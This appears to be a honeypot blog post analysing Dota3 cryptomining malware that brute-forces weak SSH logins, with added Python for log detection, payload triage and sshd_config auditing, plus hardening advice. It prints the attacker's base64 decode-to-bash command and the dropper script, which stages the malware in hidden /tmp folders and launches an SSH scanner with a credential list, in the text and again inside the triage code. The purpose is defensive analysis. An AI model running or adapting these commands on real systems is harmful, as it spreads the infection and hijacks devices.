Dota Malware

Johnathan C
3 min read · Mar 19, 2022


When we talk about Dota here we are not talking about a third game in Valve's Dota franchise; we are talking about malware. Valve's MOBA games are called Dota and Dota 2, but the Dota malware family is something else entirely: Juniper Threat Labs has seen several variations of it, the latest being Dota3.

Why do we care about Dota? Today's world is flooded with devices that fall under the IoT, or Internet of Things, and many of them are publicly hosted with SSH exposed for management. Dota's main attack vector is brute-forcing weak SSH logins using large dictionaries of default credentials. Once it authenticates, the attacker executes a series of commands to gather system information, then changes the user's password and establishes persistence by adding their own SSH key to authorized_keys.

Main goal of Dota: find IoT devices with weak SSH credentials, gain access, gain persistence, and install Dota, which adds your hosts to a crypto-mining campaign that uses your endpoints' resources to scan the internet and mine cryptocurrency.

An example of a real attack, observed on my honeypot, is shown below. Once the attacker successfully logged in with the weak SSH credentials deane/deane, they immediately started gathering system info, then attempted password changes, storing them in /tmp/up.txt, before finally uploading the Dota3 malware.

[Screenshot: Commands executed after successful SSH login]
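The dictionary attack the post describes leaves a recognisable trace in sshd's own log: a burst of failed password attempts for many different usernames from one source, followed by an "Accepted password" from that same source. The following is an added detection example written for this article, not code from the post or from any honeypot; the auth.log lines are constructed in standard OpenSSH format, and the hostname, addresses and pids are invented.

```python
import re
from collections import defaultdict

# Constructed sample lines in OpenSSH auth.log format, modelled on the dictionary
# attack described in the post; the hostname, addresses and pids are invented.
SAMPLE_AUTH_LOG = """\
Mar 19 10:00:01 iot-gw sshd[2101]: Failed password for invalid user admin from 203.0.113.5 port 40101 ssh2
Mar 19 10:00:02 iot-gw sshd[2102]: Failed password for invalid user pi from 203.0.113.5 port 40102 ssh2
Mar 19 10:00:03 iot-gw sshd[2103]: Failed password for root from 203.0.113.5 port 40103 ssh2
Mar 19 10:00:04 iot-gw sshd[2104]: Failed password for invalid user ubnt from 203.0.113.5 port 40104 ssh2
Mar 19 10:00:05 iot-gw sshd[2105]: Failed password for deane from 203.0.113.5 port 40105 ssh2
Mar 19 10:00:06 iot-gw sshd[2106]: Accepted password for deane from 203.0.113.5 port 40106 ssh2
Mar 19 10:05:00 iot-gw sshd[2200]: Accepted publickey for ops from 198.51.100.7 port 50000 ssh2
Mar 19 10:06:00 iot-gw sshd[2201]: Failed password for ops from 198.51.100.7 port 50001 ssh2
"""

# Matches both "Failed password for invalid user X from IP" and "Accepted password for X from IP".
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port (?P<port>\d+)"
)


def parse_auth_log(log_text):
    """Yield one dict per sshd login line; lines that do not match are ignored."""
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            yield m.groupdict()


def summarize_sources(log_text):
    """Per source IP: number of failed logins and the set of usernames tried.
    Many distinct usernames from one IP is the signature of a credential dictionary."""
    summary = defaultdict(lambda: {"failures": 0, "users": set()})
    for ev in parse_auth_log(log_text):
        entry = summary[ev["ip"]]
        entry["users"].add(ev["user"])
        if ev["result"] == "Failed":
            entry["failures"] += 1
    return dict(summary)


def detect_dictionary_logins(log_text, threshold=3):
    """Return (ip, user, failures_before_success) for every password login that
    succeeded after at least `threshold` failures from the same source IP.
    The counter resets after a hit so a later compromise is reported separately."""
    failures = defaultdict(int)
    hits = []
    for ev in parse_auth_log(log_text):
        ip = ev["ip"]
        if ev["result"] == "Failed":
            failures[ip] += 1
        elif ev["method"] == "password" and failures[ip] >= threshold:
            hits.append((ip, ev["user"], failures[ip]))
            failures[ip] = 0
    return hits


if __name__ == "__main__":
    for ip, user, n in detect_dictionary_logins(SAMPLE_AUTH_LOG):
        print(f"ALERT: {ip} logged in as {user} after {n} failed attempts")
```

Run against a real auth.log or journald export the same way; the key-based login from 198.51.100.7 is deliberately left unflagged, since a single failure followed by a public-key login is normal operator behaviour and the alert is meant for password logins that follow a credential spray.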

Immediately after the Dota malware is uploaded to the honeypot, the attacker attempts to execute some commands that are base64 encoded.

[Screenshot: Command executed, base64 encoded]

Command: sleep 15s && cd /var/tmp; echo "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" | base64 --decode | bash

Decoding this command gives the output below:

[Screenshot: Decoded output of the command]

The decoded command is a script that removes the directories that would have been created if the host had been compromised before, then moves the malware uploaded to the server into the /tmp folder and executes it from there.

#!/bin/bash
cd /tmp
rm -rf .ssh
rm -rf .mountfs
rm -rf .X13-unix
rm -rf .X17-unix
rm -rf .X19-unix
mkdir .X19-unix
cd .X19-unix
mv /var/tmp/dota3.tar.gz dota3.tar.gz
tar xf dota3.tar.gz
sleep 3s && cd /tmp/.X19-unix/.rsync/c
nohup /tmp/.X19-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&
sleep 8m && nohup /tmp/.X19-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&
sleep 20m && cd ..; /tmp/.X19-unix/.rsync/initall 2>1&
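The `echo "<base64>" | base64 --decode | bash` construction above is worth handling mechanically, because the same shape turns up in many honeypot captures and the interesting content is only visible after decoding. The following is an added triage example written for this article, not code from the post: it pulls the base64 stage out of a captured command, decodes it, and reports the indicators the decoded script carries (hidden staging directories under /tmp, cleanup of earlier infections, the tarball drop, the credential list, and the backgrounded port-22 scanner). Since the post's encoded blob is elided, the example re-encodes the decoded script reproduced from the post to build a command of the same shape; the regexes and indicator names are this example's own.

```python
import base64
import binascii
import re

# The dropper script as decoded in the post (the attacker's script, reproduced
# verbatim); the example re-encodes it so the decoding stage can run offline.
DROPPER_SCRIPT = """#!/bin/bash
cd /tmp
rm -rf .ssh
rm -rf .mountfs
rm -rf .X13-unix
rm -rf .X17-unix
rm -rf .X19-unix
mkdir .X19-unix
cd .X19-unix
mv /var/tmp/dota3.tar.gz dota3.tar.gz
tar xf dota3.tar.gz
sleep 3s && cd /tmp/.X19-unix/.rsync/c
nohup /tmp/.X19-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&
sleep 8m && nohup /tmp/.X19-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&
sleep 20m && cd ..; /tmp/.X19-unix/.rsync/initall 2>1&
"""


def build_observed_command(script):
    """Constructed: rebuild a command of the same shape the honeypot captured,
    with the script base64-encoded in place of the post's elided blob."""
    payload = base64.b64encode(script.encode()).decode()
    return f'sleep 15s && cd /var/tmp; echo "{payload}" | base64 --decode | bash'


# echo "<base64>" | base64 -d|--decode   (the encoded stage)
ECHO_B64_RE = re.compile(r'echo\s+["\']?([A-Za-z0-9+/=]+)["\']?\s*\|\s*base64\s+(?:-d\b|--decode)')
# base64 decode piped straight into a shell (the execution stage)
DECODE_TO_SHELL_RE = re.compile(r'base64\s+(?:-d\b|--decode)\s*\|\s*(?:ba|z|da)?sh\b')


def is_decode_to_shell(command):
    """True when a base64 decode is piped directly into a shell."""
    return DECODE_TO_SHELL_RE.search(command) is not None


def extract_encoded_payloads(command):
    """Decode every echo <b64> | base64 --decode stage found in the command."""
    decoded = []
    for m in ECHO_B64_RE.finditer(command):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except binascii.Error:
            continue  # not valid base64 after all; skip rather than abort the triage
    return decoded


# Indicators drawn from the script in the post.
INDICATORS = {
    "hidden_tmp_dir": re.compile(r"/tmp/\.[A-Za-z0-9_-]+"),
    "rm_hidden_dir": re.compile(r"rm -rf \.\S+"),
    "tarball_stage": re.compile(r"\S+\.tar\.gz"),
    "cred_list": re.compile(r"/tmp/up\.txt"),
    "background_scanner": re.compile(r"nohup .*-p 22 .*"),
}


def triage_script(script):
    """Map indicator name -> sorted unique matches present in the script."""
    findings = {}
    for name, rx in INDICATORS.items():
        hits = sorted({m.group(0) for m in rx.finditer(script)})
        if hits:
            findings[name] = hits
    return findings


if __name__ == "__main__":
    cmd = build_observed_command(DROPPER_SCRIPT)
    print("decode-to-shell:", is_decode_to_shell(cmd))
    for script in extract_encoded_payloads(cmd):
        for name, hits in triage_script(script).items():
            print(f"{name}: {hits}")
```

The decode step uses `validate=True` so a quoted string that merely looks like base64 is skipped instead of producing garbage; the indicator table is deliberately a dict of compiled patterns so new observations from the honeypot can be added as one line each.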

Looking at the logs my honeypot produced for the month of March, there are several attempts to upload malicious files named Dota or dota3. This reinforces the point that just because the malware has evolved into Dota3 does not mean the other variations will stop appearing; malware first seen back in 2019 is still persistent in 2022.

[Screenshot: Observations of Dota malware on the honeypot]

Protecting Against Such Attacks:

Only allow SSH authentication attempts from an approved allowlist of IPs, or put SSH management behind a VPN.

Enable 2FA on any public-facing application nowadays, especially on management devices.

Require RSA key-based authentication to connect over SSH instead of passwords.
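The three recommendations above map onto concrete sshd_config directives, and the gap between a default-like configuration and a hardened one is easy to audit mechanically. The following is an added example written for this article, not code or configuration from the post: it embeds two constructed sshd_config fragments (a password-only setup of the kind Dota targets, and one implementing the recommendations) and checks each against the controls. The directive names are real OpenSSH options; the assumption that the second factor is delivered via `keyboard-interactive` (a PAM one-time-password module) on top of the key, and the user name and management network addresses, are this example's own choices.

```python
# Constructed sshd_config fragments (not from the post): a password-only setup of the
# kind Dota targets, and one implementing the three recommendations above.
WEAK_SSHD_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PubkeyAuthentication yes
"""

HARDENED_SSHD_CONFIG = """\
Port 22
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
# second factor (assumed: a PAM one-time-password module) chained after the key
KbdInteractiveAuthentication yes
AuthenticationMethods publickey,keyboard-interactive
# only the ops user, and only from the management networks (user@host patterns)
AllowUsers ops@10.0.0.* ops@192.0.2.*
MaxAuthTries 3
Match Address 10.0.0.0/8
    PermitRootLogin no
"""


def parse_global_directives(config_text):
    """Return {directive_lowercase: [values...]} for the global section only.
    Parsing stops at the first Match block; the rarer 'Key=value' spelling is not handled."""
    directives = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        if key == "match":
            break
        directives.setdefault(key, []).append(parts[1] if len(parts) > 1 else "")
    return directives


def second_factor_required(methods_value):
    """AuthenticationMethods lists alternatives separated by spaces; each alternative is a
    comma-separated chain that must all succeed. Require every alternative to chain >= 2."""
    alternatives = methods_value.split()
    return bool(alternatives) and all(len(alt.split(",")) >= 2 for alt in alternatives)


def audit_sshd_config(config_text):
    """Map each control from the recommendations to True (met) or False (not met).
    Defaults follow current OpenSSH: password and pubkey auth on, root limited to keys."""
    d = parse_global_directives(config_text)

    def last(key, default):
        # sshd uses the first occurrence, but for an audit the last one written is the
        # one an operator most likely intended; both fragments above have one of each.
        return d.get(key, [default])[-1].lower()

    allow_users = " ".join(d.get("allowusers", [])).split()
    return {
        "password_auth_disabled": last("passwordauthentication", "yes") == "no",
        "pubkey_auth_enabled": last("pubkeyauthentication", "yes") == "yes",
        "root_login_disabled": last("permitrootlogin", "prohibit-password") in ("no", "prohibit-password"),
        "second_factor_required": second_factor_required(" ".join(d.get("authenticationmethods", []))),
        "source_restricted": any("@" in u for u in allow_users),
    }


def failing_controls(config_text):
    """Sorted names of the controls a configuration does not meet."""
    return sorted(k for k, ok in audit_sshd_config(config_text).items() if not ok)


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_SSHD_CONFIG), ("hardened", HARDENED_SSHD_CONFIG)):
        print(f"{label}: failing controls = {failing_controls(cfg)}")
```

Point `audit_sshd_config` at the contents of `/etc/ssh/sshd_config` to check a real host; the `source_restricted` control only looks at `AllowUsers user@host` patterns, so a deployment that restricts sources at the firewall or VPN instead will show it as failing and should be judged on that basis.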
